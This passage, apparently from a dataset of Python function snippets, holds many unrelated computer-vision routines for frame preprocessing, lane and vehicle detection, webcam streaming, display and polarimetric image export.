self.__get_lane_lines(thresholded)\n lane_img = self.__draw_lane_lines(undistorted, thresholded, include_stats=True)\n\n\n ##### Vehicle Tracking pipeline #####\n\n hot_windows = self.windFinder.get_hot_windows(img)\n car_boxes, wrap_img = self.vTracker.image_pipeline(img, hot_windows,\n return_img=False) \n # img = cv2.addWeighted(img, 1, wrap_img, 0.5, 0)\n result = self.__draw_boxes(lane_img, car_boxes)\n\n return result", "def processFrame(frame, shape=(84, 84)):\n frame = frame.astype(np.uint8) # cv2 requires np.uint8\n # Apply a rgb filter to convert RGB to Gray Scale\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n # crop image OpenCv2 function to format img[y:y + h, x:x + w]\n frame = frame[34:34+160, :160] # crop image\n frame = cv2.resize(frame, shape, interpolation=cv2.INTER_NEAREST)\n frame = frame.reshape((*shape, 1))\n #cv2.imshow('Cropped Image', frame)\n\n return frame", "def PrePush(self, image):\n pass", "def display_preprocessed(env,frame):\n env.reset()\n\n #Plot the figure\n plt.figure()\n\n #Show the pre processed frame\n plt.imshow(preprocess_frame(env.reset(), (0, 0, 0, 0), 84), cmap=\"gray\")\n\n #Add title\n plt.title('Pre Processed image')\n\n #Show the plot\n plt.show()", "def add_frame(self, frame, player_box):\n # ROI is a small box around the player\n box_center = center_of_box(player_box)\n patch = frame[int(box_center[1] - self.box_margin): int(box_center[1] + self.box_margin),\n int(box_center[0] - self.box_margin): int(box_center[0] + self.box_margin)].copy()\n patch = imutils.resize(patch, 299)\n frame_t = patch.transpose((2, 0, 1)) / 255\n frame_tensor = torch.from_numpy(frame_t).type(self.dtype)\n frame_tensor = self.normalize(frame_tensor).unsqueeze(0)\n with torch.no_grad():\n # forward pass\n features = self.feature_extractor(frame_tensor)\n features = features.unsqueeze(1)\n # Concatenate the features to previous features\n if 
self.frames_features_seq is None:\n self.frames_features_seq = features\n else:\n self.frames_features_seq = torch.cat([self.frames_features_seq, features], dim=1)", "def grab_next_frame(self):\n if Rescue_PI.input_video_file_path is None:\n self.orig_frame = self.vs.read()\n self.frame = self.orig_frame.copy()\n else:\n _, self.frame = self.vs.read()\n # self.frame = cv2.rotate(self.frame, cv2.ROTATE_180)\n if self.frame is None:\n pass\n else:\n self.frame = imutils.resize(self.frame, width=frame_width_in_pixels)", "def gen(camera):\n \n while True:\n \n \n \n frame = camera.get_frame()\n \n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def apply(self, fn):\n return Frame(fn(self.rgb))", "def process_frame(self, img):\n found = []\n for scale in self.settings['scales']:\n found.extend(find_cars(img, scale[0], scale[1], scale[2], scale[3], scale[4], self.clf, self.scaler,\n self.settings['color_space'], self.settings['orient'], self.settings['pix_per_cell'],\n self.settings['cell_per_block'], self.settings['spatial_size'],\n self.settings['hist_bins'], self.log, self.settings['min_conf']))\n\n self.prev_frames.append(found)\n if len(self.prev_frames) > self.settings['n_frames']:\n self.prev_frames.pop(0)\n heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n for frame in self.prev_frames:\n f_heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n add_heat(f_heatmap, frame)\n heatmap = heatmap * f_heatmap\n\n acc_heatmap = np.copy(heatmap)\n\n bboxes = find_bboxes_from_heatmap(apply_threshold(heatmap,\n self.settings['heat_threshold'] ** self.settings['n_frames']))\n\n if self.settings['DEBUG']:\n single_heatmap = add_heat(np.zeros_like(img[:, :, 0]).astype(np.float), found)\n single_heatmap = np.clip(single_heatmap, 0, 255)\n single_heatmap = np.dstack((single_heatmap, single_heatmap, single_heatmap))\n acc_heatmap = np.sqrt(acc_heatmap)\n acc_heatmap = np.clip(acc_heatmap, 0, 255)\n acc_heatmap = np.dstack((acc_heatmap, acc_heatmap, acc_heatmap))\n labels = np.clip(heatmap, 0, 1)*255\n labels = np.dstack((labels, labels, labels))\n final = draw_boxes(img, bboxes)\n frame = np.concatenate((np.concatenate((single_heatmap, acc_heatmap), axis=1),\n np.concatenate((labels, final), axis=1)), axis=0)\n return cv2.resize(frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)))\n else:\n return draw_boxes(img, bboxes)", "def update(self):\r\n\r\n # Update the vision frames in the system\r\n self._system.update()\r\n\r\n # Create blank PIL images to hold the video streams\r\n layered = PIL.Image.new('RGBA', (400, 400))\r\n stacked = PIL.Image.new('RGBA', (200, 800))\r\n control = PIL.Image.new('RGBA', (600, 800))\r\n\r\n focalpoint = self._system[self._appString[\"device\"].get()].focalpoint()\r\n # print(focalpoint)\r\n\r\n # Get each vision key and vision for the selected device\r\n visionList = [(visionKey, vision) for visionKey, vision in self._system[self._appString[\"device\"].get()]]\r\n\r\n # Loop through each vision in the vision list\r\n for i, (visionKey, vision) in enumerate(visionList):\r\n\r\n # Grab the frames from the vision when it is \"curr\"\r\n frameList = [frame for frameKey, frame in vision if frameKey==self._appString[\"frame\"].get()]\r\n\r\n # Loop through each frame in the frame list\r\n for frame in frameList:\r\n\r\n # Get the properties and turn the image into RGBA\r\n ratio, size = vision.properties()\r\n rgbFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n\r\n # print(rgbFrame.shape)\r\n width, height, channels = 
rgbFrame.shape\r\n\r\n # Paste the images together in layered\r\n\r\n imgFrame = PIL.Image.fromarray(cv2.resize(rgbFrame, (int(400 * ratio), int(400 * ratio))))\r\n layered.paste(imgFrame, (int(200 * (1 - ratio)), int(200 * (1 - ratio))))\r\n\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200 / width)), int(200 * (1 - ratio) - focalpoint[1] * (200 / height))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200 // width)), int(200 * (1 - ratio) - focalpoint[1] * (200 // height))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (ratio ** -1)), int(200 * (1 - ratio) - focalpoint[1] * (ratio ** -1))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200/width) / ratio), int(200 * (1 - ratio) - focalpoint[1] * (200/height) / ratio)))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (200 / width)), int(200 * (1 - ratio) - focalpoint[1] * (200 / height))))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (ratio ** -1) / 200), int(200 * (1 - ratio) - focalpoint[1] * (ratio ** -1) / 200)))\r\n # layered.paste(imgFrame, (int(200 * (1 - ratio) + focalpoint[0] * (400//width * (1- ratio))), int(200 * (1 - ratio) - focalpoint[1] * (400//height * (1 - ratio)))))\r\n\r\n # Paste the images together in stacked\r\n imgFrame = PIL.Image.fromarray(cv2.resize(rgbFrame, (200, 200)))\r\n stacked.paste(imgFrame, (0, 200 * i))\r\n\r\n # Add the stacked image to the canvas\r\n self._pilFrames[\"stacked\"] = PIL.ImageTk.PhotoImage(image=stacked)\r\n self._appCanvas[\"stacked\"].create_image(100, 0, image=self._pilFrames[\"stacked\"], anchor=tkinter.NW)\r\n\r\n # Add the layered image to the canvas\r\n self._pilFrames[\"layered\"] = PIL.ImageTk.PhotoImage(image=layered)\r\n self._appCanvas[\"layered\"].create_image(0, 0, image=self._pilFrames[\"layered\"], anchor=tkinter.NW)\r\n\r\n # Add the control image to the canvas\r\n imgFrame = cv2.cvtColor(self._system[self._appString[\"device\"].get()][self._appString[\"vision\"].get()][self._appString[\"frame\"].get()], cv2.COLOR_BGR2RGBA)\r\n control = PIL.Image.fromarray(cv2.resize(imgFrame, (600, 600)))\r\n self._pilFrames[\"control\"] = PIL.ImageTk.PhotoImage(image=control)\r\n self._appCanvas[\"control\"].create_image(100, 90, image=self._pilFrames[\"control\"], anchor=tkinter.NW)\r\n\r\n # Continue to update with a delay of 15\r\n self.after(15, self.update)", "def start(self):\n\t\twhile self.capture_status:\n\t\t\t_, frame = self.cap.read()\n\t\t\tc_frame = frame[self.width / 2 - self.face_width / 2: self.width / 2 + self.face_width / 2,\n\t\t\t self.height / 2 - self.face_width / 2: self.height / 2 + self.face_height / 2, :]\n\t\t\tif not self.in_processing:\n\t\t\t\tself.frame = frame\n\t\t\t\tself.in_processing = True\n\t\t\tsleep(0.2)\n\t\tyield cv2.imdecode('png', c_frame)", "def style_transfer_postprocess(preprocessed_frame: np.ndarray, image_shape: tuple):\n\n postprocessed_frame = np.squeeze(preprocessed_frame, axis=0)\n # select original height and width from image_shape\n frame_height = image_shape[0]\n frame_width = image_shape[1]\n postprocessed_frame = cv2.resize(postprocessed_frame, (frame_width, frame_height)).astype(\"float32\") * 255\n postprocessed_frame = cv2.cvtColor(postprocessed_frame, cv2.COLOR_RGB2BGR)\n\n return postprocessed_frame", "def registerDepthFrame(self, frame):\n h, w = frame.shape[:2]\n frame = cv2.warpAffine(frame,self.depth2rgb_affine,(w,h))\n\n return frame", "def pre_handler(frame):\n 
img_data, _im0 = preprocess(frame, IMAGE_HEIGHT, IMAGE_WIDTH, False)\n return kdp_wrapper.convert_float_to_rgba(img_data, 8, 520, True)", "def gen():\n while True:\n retval, frame = vc.read()\n\n if retval:\n #image_processing(frame)\n frame = cv2.imencode('.jpg', frame)[1].tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def process_frame(self, downsize):\n # if (not hasattr(downsize,'shape')) and (not hasattr(downsize,'len')):\n # downsize = np.array(downsize)\n\n if type(downsize) != np.ndarray:\n raise TypeError\n\n if not downsize.any():\n raise ValueError\n\n if self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.frame_history.append(downsize)\n\n # Remove no longer needed frames from memory\n self.frame_history = self.frame_history[-(self.LMC_rec_depth):]\n downsize = signal.lfilter(self.b, self.a, self.frame_history, axis=0)[-1]\n\n # Center surround antagonism kernel applied.\n\n downsize = cv2.filter2D(downsize, -1, self.CSKernel)\n\n # RTC filter.\n u_pos = deepcopy(downsize)\n u_neg = deepcopy(downsize)\n u_pos[u_pos < 0] = 0\n u_neg[u_neg > 0] = 0\n u_neg = -u_neg\n\n # On first step, instead of computing just save the images.\n if self.t == self.T0:\n self.v_pos_prev = deepcopy(u_pos)\n self.v_neg_prev = deepcopy(u_neg)\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Do everything for pos == ON.\n tau_pos = u_pos - self.u_pos_prev\n tau_pos[tau_pos >= 0] = 0.001\n tau_pos[tau_pos < 0] = 0.1\n mult_pos = self.rtc_exp(self.dt, tau_pos)\n v_pos = -(mult_pos - 1) * u_pos + mult_pos * self.v_pos_prev\n self.v_pos_prev = deepcopy(v_pos)\n\n # Do everything for neg == OFF.\n tau_neg = u_neg - self.u_neg_prev\n tau_neg[tau_neg >= 0] = 0.001\n tau_neg[tau_neg < 0] = 0.1\n mult_neg = self.rtc_exp(self.dt, tau_neg)\n v_neg = -(mult_neg - 1) * u_neg + mult_neg * self.v_neg_prev\n self.v_neg_prev = deepcopy(v_neg)\n\n # keep track of previous u.\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Subtract v from u to give the output of each channel.\n out_pos = u_pos - v_pos\n out_neg = u_neg - v_neg\n\n # Now apply yet another filter to both parts.\n out_pos = cv2.filter2D(out_pos, -1, self.H_filter)\n out_neg = cv2.filter2D(out_neg, -1, self.H_filter)\n out_pos[out_pos < 0] = 0\n out_neg[out_neg < 0] = 0\n\n if self.t == self.T0:\n self.out_neg_prev = deepcopy(out_neg)\n\n # Delay off channel.\n out_neg = signal.lfilter(self.b1, self.a1, [self.out_neg_prev, out_neg], axis=0)[-1]\n self.out_neg_prev = out_neg\n downsize = out_neg * out_pos\n\n # Show image.\n downsize *= self.gain\n downsize = np.tanh(downsize)\n\n # Threshold.\n downsize[downsize < self.threshold] = 0\n\n if not self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.t += self.dt\n\n return downsize", "def calculate_frame(self):\n frame = self.stream.read()\n self.keypoints, self.image = self.openpose.forward(frame, True)", "def pipeline(image, plot = False):\n # undistort image\n undistorted_image = undistort_image(image)\n \n # R&S|sobel-x thresholding\n _, _, _, _, threshold_image = thresholding(undistorted_image)\n \n # yellow mask\n _, mask_yellow = filter_color(undistorted_image, np.array([20,100,100]), np.array([50,255,255]))\n \n # white mask\n _, mask_white = filter_color(undistorted_image, np.array([0,0,220]), np.array([255,35,255]))\n \n # combine yellow and white mask\n mask = 
cv2.bitwise_or(mask_yellow, mask_white)\n comb_image = np.zeros_like(threshold_image)\n \n # combine mask and thresholded image\n comb_image[(mask > 0)&(threshold_image == 1)] = 1\n \n # warp the binary image\n warped_image, Minv = warp(comb_image, src, dst)\n if plot:\n plt.figure(2)\n plt.imshow(warped_image, cmap = \"gray\")\n plt.title(\"Binary warped image\")\n \n # calculate polynomial fit\n left_fitx, right_fitx, ploty, left_curverad, right_curverad, offset = fit_polynomial(warped_image, plot)\n \n # superimpose lines on top of the polynomial\n superimposed_image = mark_lane_lines(undistorted_image, warped_image, ploty, left_fitx, right_fitx, Minv)\n cv2.putText(superimposed_image, \"Left curvature = \" + str(np.round(left_curverad, 2)) + \" m\",(40,40), \\\n cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2)\n cv2.putText(superimposed_image,\"Right curvature = \" + str(np.round(right_curverad, 2)) + \" m\",(40,80), \\\n cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2)\n cv2.putText(superimposed_image,\"Offset = \" + str(np.round(offset*100, 2)) + \" cm\",(40,120), \\\n cv2.FONT_HERSHEY_PLAIN, 2, (255,0,0), 2)\n \n return superimposed_image", "def process_image():\n global last_frame, is_streaming\n i=0\n\n imgproc = ImgProc()\n while(True):\n if last_frame is not None and is_streaming:\n time.sleep(0.1)\n\n print(\"Processing frame \", i)\n imgproc.detect_object(last_frame, i)\n print(\"Processing complete \", i)\n i+=1", "def captureNextFrame(self):\n ret, readFrame=self.capture.read()\n if(ret==True):\n self.currentFrame=cv2.cvtColor(readFrame,cv2.COLOR_BGR2RGB)", "def render(self, frame: Frame):\n\n cv2.imshow(winname=self.title, mat=frame)\n cv2.waitKey(delay=self.delay)\n\n if self.step:\n while cv2.waitKey(delay=0) != self.step_key:\n continue", "def draw(self, frame):\n frame[OFS:OFS+self.image.shape[0], OFS:OFS+self.image.shape[1]] = self.image", "def generate_video(head_model, tail_model, ctx_proc, n_frames, img_size, n_flow, n_block, temp=0.7, label=None):\n # lookup label embeddings as input to model\n\n image = generate_image(head_model, img_size, n_flow, n_block, 1, temp, label=label)\n frames = [image]\n state = torch.zeros(1, ctx_proc.nc_state, img_size, img_size).to(device)\n for j in range(n_frames-1):\n prev_frame = frames[-1]\n ctx=prev_frame\n if args.use_state:\n # produce new state given the previous frame\n state = ctx_proc(prev_frame, state)\n state = ctx_proc.norms[j](state) # normalize each state across all frames\n # add state to context for glow to generate from\n ctx = torch.cat([ctx, state], dim=1)\n\n frame = generate_image(tail_model, img_size, n_flow // 32, n_block, 1, temp, ctx=ctx)\n #frame = frames[-1] + delta\n frames.append(frame)\n result = torch.stack(frames, dim=1).squeeze(0)\n return result", "def stream_frames(video_capture):", "def run(self):\n while True:\n global currentFrame\n\n temp = getImageNumber(currentFrame)\n angle = getMeasurement(currentFrame) * -60\n height, width, depth = temp.shape\n newimg = cv2.resize(temp, (width * 3, height * 3))\n newimg = cv2.cvtColor(newimg, cv2.COLOR_RGB2RGBA)\n\n s_img = cv2.imread(\"up.png\", -1)\n s_img = self.rotateImage(s_img, angle)\n s_img = cv2.resize(s_img, (50,50))\n y_offset = 400\n x_offset = 50\n y1, y2 = y_offset, y_offset + s_img.shape[0]\n x1, x2 = x_offset, x_offset + s_img.shape[1]\n\n alpha_s = s_img[:, :, 3] / 255.0\n alpha_l = 1.0 - alpha_s\n\n for c in range(0, 3):\n newimg[y1:y2, x1:x2, c] = (alpha_s * s_img[:, :, c] +\n alpha_l * newimg[y1:y2, x1:x2, c])\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n 
cv2.putText(newimg, str(currentFrame), (10, 50), font, 2, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.imshow('image', newimg)\n cv2.waitKey(1)", "def imaging(input_model, reference_files):\n detector = cf.Frame2D(name='detector', axes_order=(0, 1), unit=(u.pix, u.pix))\n v2v3 = cf.Frame2D(name='v2v3', axes_order=(0, 1), unit=(u.deg, u.deg))\n world = cf.CelestialFrame(reference_frame=coord.ICRS(), name='world')\n\n subarray2full = subarray_transform(input_model)\n imdistortion = imaging_distortion(input_model, reference_files)\n distortion = subarray2full | imdistortion\n distortion.bounding_box = imdistortion.bounding_box\n del imdistortion.bounding_box\n tel2sky = pointing.v23tosky(input_model)\n pipeline = [(detector, distortion),\n (v2v3, tel2sky),\n (world, None)]\n return pipeline", "def pipeline(self,img,debug=0):\n\t\timg = self.cam.undist(img)\n\t\t#get warped binary image\n\t\tbinary_warped = self.cam.warp(Image(img).binary_th())\n\t\tbw_shape = binary_warped.shape\n\t\t\n\t\tif (self.leftLine.detected == True and self.rightLine.detected == True):\n\t\t\tself.quick_search(binary_warped,debug)\n\t\telse:\n\t\t\tself.blind_search(binary_warped,debug)\n\t\n\t\tif (self.leftLine.fit!=None and self.rightLine.fit!=None):\n\t\t\tpolygon = self.fill_lane(bw_shape)\n\t\t\tunwarped_polygon = self.cam.unwarp(polygon)\n\t\t\t# calculate position of lane's center \n\t\t\ttemp = np.nonzero(unwarped_polygon[-1,:,1])[0]\n\t\t\tleft, right = temp[0], temp[-1]\n\t\t\tself.center = (int(bw_shape[1]/2) - (int((right-left)/2)+int(left)))*7.4/1280\n\t\t\timg_lines = weighted_img(unwarped_polygon,img, α=1, β=0.5, λ=0.)\n\t\t\t# write text on image\n\t\t\tfont = cv2.FONT_HERSHEY_SIMPLEX\n\t\t\ttext1 = 'Radius of Curvature: {:.0f}m'.format(np.mean((self.leftLine.radius, self.rightLine.radius)))\n\t\t\ttext2 = 'Distance is {:.2f}m {} of center'.format(abs(self.center), 'left' if self.center<0 else 'right')\n\n\t\t\tcv2.putText(img_lines, text1, (100,100), font, 1,(255,255,255),2)\n\t\t\tcv2.putText(img_lines, text2 ,(100,140), font, 1,(255,255,255),2)\n\t\t\t\n\t\t\tif (debug==1):\n\t\t\t\tshow_2gr(polygon, unwarped_polygon)\n\t\t\t\tshow_2gr(binary_warped, unwarped_polygon)\n\n\t\t\treturn img_lines\n\n\t\telse:\n\t\t\t# no lines detected and not fit available: return original image\n\t\t\t# without lines\n\t\t\treturn img", "def concatenate_frames(I, Stokes, AOP, DOP, path_process, k, imgs_polar): #, Min, Max, im_cos, im_sin, rho, phi):\n\n \"\"\"# Fusion\n im_fusion = np.zeros((500, 500, 5), dtype=int)\n im_fusion[:, :, 0] = Stokes[0]\n im_fusion[:, :, 1] = Stokes[1]\n im_fusion[:, :, 2] = Stokes[2]\n im_fusion[:, :, 3] = AOP\n im_fusion[:, :, 4] = DOP\n if not os.path.exists(path_process + \"Fusion/\"):\n os.mkdir(path_process + \"Fusion/\")\n np.save(path_process + \"Fusion/\" + imgs_polar[k].split(\".\")[0], im_fusion.astype(np.uint8))\"\"\"\n\n \"\"\"# RetinaNet intensities\n im_I04590 = np.zeros((500, 500, 3))\n im_I04590[:, :, 0] = I[0]\n im_I04590[:, :, 1] = I[1]\n im_I04590[:, :, 2] = I[2]\n if not os.path.exists(path_process + \"I04590/\"):\n os.mkdir(path_process + \"I04590/\")\n imageio.imwrite(path_process + \"I04590/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I04590)\n\n # Min Max total intensity\n im_min_max = np.zeros((500, 500, 3))\n im_min_max[:, :, 0] = Stokes[0]\n im_min_max[:, :, 1] = Max\n im_min_max[:, :, 2] = Min\n if not os.path.exists(path_process + \"MinMax/\"):\n os.mkdir(path_process + \"MinMax/\")\n imageio.imwrite(path_process + \"MinMax/\" + imgs_polar[k].split(\".\")[0] 
+ \".png\", im_min_max)\n\n # Cos Sin total intensity\n im_cos_sin = np.zeros((500, 500, 3))\n im_cos_sin[:, :, 0] = Stokes[0]\n im_cos_sin[:, :, 1] = im_cos\n im_cos_sin[:, :, 2] = im_sin\n if not os.path.exists(path_process + \"CosSin/\"):\n os.mkdir(path_process + \"CosSin/\")\n imageio.imwrite(path_process + \"CosSin/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_cos_sin)\"\"\"\n\n \"\"\"# Cos Sin total intensity\n im_cos_sin = np.zeros((500, 500, 3))\n im_cos_sin[:, :, 0] = DOP\n im_cos_sin[:, :, 1] = im_cos\n im_cos_sin[:, :, 2] = im_sin\n if not os.path.exists(path_process + \"CosSin2_s/\"):\n os.mkdir(path_process + \"CosSin2_s/\")\n imageio.imwrite(path_process + \"CosSin2_s/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_cos_sin)\"\"\"\n\n\n \"\"\"im_I045135 = np.zeros((500, 500, 3))\n im_I045135[:, :, 0] = I[0]\n im_I045135[:, :, 1] = I[3]\n im_I045135[:, :, 2] = I[1]\n if not os.path.exists(path_process + \"I013545/\"):\n os.mkdir(path_process + \"I013545/\")\n imageio.imwrite(path_process + \"I013545/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I045135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0]\n im_I090135[:, :, 1] = I[2]\n im_I090135[:, :, 2] = I[3]\n if not os.path.exists(path_process + \"I090135/\"):\n os.mkdir(path_process + \"I090135/\")\n imageio.imwrite(path_process + \"I090135/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I090135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[1]\n im_I4590135[:, :, 1] = I[2]\n im_I4590135[:, :, 2] = I[3]\n if not os.path.exists(path_process + \"I4590135/\"):\n os.mkdir(path_process + \"I4590135/\")\n imageio.imwrite(path_process + \"I4590135/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_I4590135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0] - I[1]\n im_I090135[:, :, 1] = I[0]\n im_I090135[:, :, 2] = I[0] + I[1]\n if not os.path.exists(path_process + \"RetinaNet_Ieq1/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq1/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq1/\" + str(k) + \".png\", im_I090135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0] - I[3]\n im_I090135[:, :, 1] = I[0]\n im_I090135[:, :, 2] = I[0] + I[3]\n if not os.path.exists(path_process + \"RetinaNet_Ieq2/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq2/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq2/\" + str(k) + \".png\", im_I090135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[1] - I[2]\n im_I090135[:, :, 1] = I[1]\n im_I090135[:, :, 2] = I[1] + I[2]\n if not os.path.exists(path_process + \"RetinaNet_Ieq3/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq3/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq3/\" + str(k) + \".png\", im_I090135)\n\n im_I090135 = np.zeros((500, 500, 3))\n im_I090135[:, :, 0] = I[0]/I[1]\n im_I090135[:, :, 1] = I[0]/I[2]\n im_I090135[:, :, 2] = I[0]/I[3]\n if not os.path.exists(path_process + \"RetinaNet_Ieq4/\"):\n os.mkdir(path_process + \"RetinaNet_Ieq4/\")\n imageio.imwrite(path_process + \"RetinaNet_Ieq4/\" + str(k) + \".png\", im_I090135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[0]\n im_I4590135[:, :, 1] = I[0]/I[1]\n im_I4590135[:, :, 2] = I[0]/I[2]\n if not os.path.exists(path_process + \"RetinaNet_eq5/\"):\n os.mkdir(path_process + \"RetinaNet_eq5/\")\n imageio.imwrite(path_process + \"RetinaNet_eq5/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[0]\n im_I4590135[:, :, 1] = I[0] / I[2]\n im_I4590135[:, 
:, 2] = I[0] / I[3]\n if not os.path.exists(path_process + \"RetinaNet_eq6/\"):\n os.mkdir(path_process + \"RetinaNet_eq6/\")\n imageio.imwrite(path_process + \"RetinaNet_eq6/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[1] / I[0]\n im_I4590135[:, :, 1] = I[1] / I[2]\n im_I4590135[:, :, 2] = I[1] / I[3]\n if not os.path.exists(path_process + \"RetinaNet_eq7/\"):\n os.mkdir(path_process + \"RetinaNet_eq7/\")\n imageio.imwrite(path_process + \"RetinaNet_eq7/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[2] / I[0]\n im_I4590135[:, :, 1] = I[2] / I[1]\n im_I4590135[:, :, 2] = I[2] / I[3]\n if not os.path.exists(path_process + \"RetinaNet_eq8/\"):\n os.mkdir(path_process + \"RetinaNet_eq8/\")\n imageio.imwrite(path_process + \"RetinaNet_eq8/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[3] / I[0]\n im_I4590135[:, :, 1] = I[3] / I[1]\n im_I4590135[:, :, 2] = I[3] / I[2]\n if not os.path.exists(path_process + \"RetinaNet_eq9/\"):\n os.mkdir(path_process + \"RetinaNet_eq9/\")\n imageio.imwrite(path_process + \"RetinaNet_eq9/\" + str(k) + \".png\", im_I4590135)\n\n im_I4590135 = np.zeros((500, 500, 3))\n im_I4590135[:, :, 0] = I[0]/I[1]\n im_I4590135[:, :, 1] = I[0] / I[2]\n im_I4590135[:, :, 2] = DOP/255\n if not os.path.exists(path_process + \"RetinaNet_eq10/\"):\n os.mkdir(path_process + \"RetinaNet_eq10/\")\n imageio.imwrite(path_process + \"RetinaNet_eq10/\" + str(k) + \".png\", im_I4590135)\"\"\"\n\n # retinaNet Stokes\n im_Stokes = np.zeros((Stokes.shape[1], Stokes.shape[2], 3))\n im_Stokes[:, :, 0] = Stokes[0]\n im_Stokes[:, :, 1] = Stokes[1]\n im_Stokes[:, :, 2] = Stokes[2]\n if not os.path.exists(path_process + \"Stokes/\"):\n os.mkdir(path_process + \"Stokes/\")\n imageio.imwrite(path_process + \"Stokes/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_Stokes)\n \"\"\"\n\n # RetinaNet Params\n im_Params = np.zeros((500, 500, 3))\n im_Params[:, :, 0] = Stokes[0]\n im_Params[:, :, 1] = AOP\n im_Params[:, :, 2] = DOP\n if not os.path.exists(path_process + \"Params/\"):\n os.mkdir(path_process + \"Params/\")\n imageio.imwrite(path_process + \"Params/\" + imgs_polar[k].split(\".\")[0] + \".png\", im_Params)\"\"\"\n\n \"\"\"# HSV image\n HSV = np.zeros((500, 500, 3))\n HSV[:, :, 0] = AOP / 255 * 179\n HSV[:, :, 1] = DOP\n HSV[:, :, 2] = Stokes[0]\n if not os.path.exists(path_process + \"HSV/\"):\n os.mkdir(path_process + \"HSV/\")\n imageio.imwrite(path_process + \"HSV/\" + imgs_polar[k].split(\".\")[0] + \".png\", HSV)\"\"\"\n\n \"\"\"inten = (I[0] + I[1] + I[2] + I[3]) / 2\n\n hsv = np.uint8(cv2.merge(((phi + np.pi/2)/np.pi*180,rho/np.max(rho)*255, inten/inten.max()*255)))\n if not os.path.exists(path_process + \"HSV_2/\"):\n os.mkdir(path_process + \"HSV_2/\")\n imageio.imwrite(path_process + \"HSV_2/\" + imgs_polar[k].split(\".\")[0] + \".png\", hsv)\"\"\"\n\n \"\"\"# TSV image\n TSV = np.zeros((500, 500, 3))\n TSV[:, :, 0] = AOP\n TSV[:, :, 1] = DOP\n TSV[:, :, 2] = inten / inten.max() * 255\n if not os.path.exists(path_process + \"RetinaNet_TSV/\"):\n os.mkdir(path_process + \"RetinaNet_TSV/\")\n imageio.imwrite(path_process + \"RetinaNet_TSV/\" + str(k) + \".png\", TSV)\n\n # Pauli image\n Pauli = np.zeros((500, 500, 3))\n Pauli[:, :, 0] = I[2]\n Pauli[:, :, 1] = I[1]\n Pauli[:, :, 2] = I[0]\n if not os.path.exists(path_process + \"RetinaNet_Pauli/\"):\n os.mkdir(path_process + \"RetinaNet_Pauli/\")\n 
